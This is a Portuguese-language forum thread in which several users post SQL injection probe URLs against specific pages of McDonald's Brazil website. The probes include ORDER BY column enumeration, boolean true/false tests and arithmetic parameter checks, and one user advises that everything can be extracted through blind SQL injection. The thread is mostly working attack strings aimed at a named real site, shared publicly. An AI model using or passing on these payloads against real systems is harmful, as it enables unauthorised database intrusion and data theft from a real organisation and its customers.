Para quem quiser. Vejam:
http://www.mcdonalds.com.br/institucional/perguntas_frequentes_resultado.asp?cmbCategoria=-1%20order%20by%201,2,3%20desc%20--
Abraços
Agora que vi que postei na seção errada. Perdão.
Nenhum conteúdo foi localizado para a expressão "". ???????????
Reeves, isto ocorre pq coloquei cmbCategoria=-1. Por isso apareceu [Nenhum conteúdo foi localizado para a expressão "". ]
E só coloquei algo que mostre o SQL Injection. Experimente http://www.mcdonalds.com.br/institucional/perguntas_frequentes_resultado.asp?cmbCategoria=-1%20order%20by%204%20-- e verá o SQL Injection.
http://www.mcdonalds.com.br/mulher/entre_amigas_home.asp?cod=20%20order%20by%201%20-- Esta página também é vulnerável.
Enfim.
Apenas para provar. O link original era: http://www.mcdonalds.com.br/institucional/perguntas_frequentes_resultado.asp?cmbCategoria=84&x=33&y=14
Altere para http://www.mcdonalds.com.br/institucional/perguntas_frequentes_resultado.asp?cmbCategoria=84 and 1=1 --
Veja que não dá nenhum erro. Agora tente:
http://www.mcdonalds.com.br/institucional/perguntas_frequentes_resultado.asp?cmbCategoria=84 and 1=0 --
Agora deu erro.
Descubra o número de tabelas por Order by:
http://www.mcdonalds.com.br/institucional/perguntas_frequentes_resultado.asp?cmbCategoria=84 order by 1 --
http://www.mcdonalds.com.br/institucional/perguntas_frequentes_resultado.asp?cmbCategoria=84 order by 2 --
Enfim. Neste site você deve conseguir tudo por Blind SQL Injection.
Abraços
Realmente... Site do McDonalds ta super vulneravel......
Vejam bem:
cmbCategoria sendo passado como 3, retorna essa página...
http://www.mcdonalds.com.br/institucional/perguntas_frequentes_resultado.asp?cmbCategoria=3
se a gente passar o cmbCategoria como 4-1:
http://www.mcdonalds.com.br/institucional/perguntas_frequentes_resultado.asp?cmbCategoria=4-1
ele ainda retorna a mesma pagina... pois 4 menos 1 é igual a 3....
Blind inject até onde eu sei continua sendo SQL inject........ ehhueuhehueeuheuheh